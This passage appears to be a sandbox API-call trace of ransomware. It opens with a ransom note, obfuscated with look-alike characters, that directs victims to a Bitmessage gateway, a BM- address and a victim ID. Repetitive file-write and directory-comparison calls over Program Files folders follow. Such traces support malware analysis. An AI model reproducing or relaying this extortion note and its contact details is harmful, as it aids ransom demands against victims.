thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a3.", lpUsedDefaultChar=0x0) returned 8717 [0213.059] WriteFile (in: hFile=0x2d0, lpBuffer=0x1f4b618*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4b618*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0213.059] CloseHandle (hObject=0x2d0) returned 1 [0213.060] Sleep (dwMilliseconds=0x3e8) [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount2=54) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\", cchCount2=23) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=23, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=23, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\", cchCount2=62) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\", cchCount2=62) returned 3 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\", cchCount2=62) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", 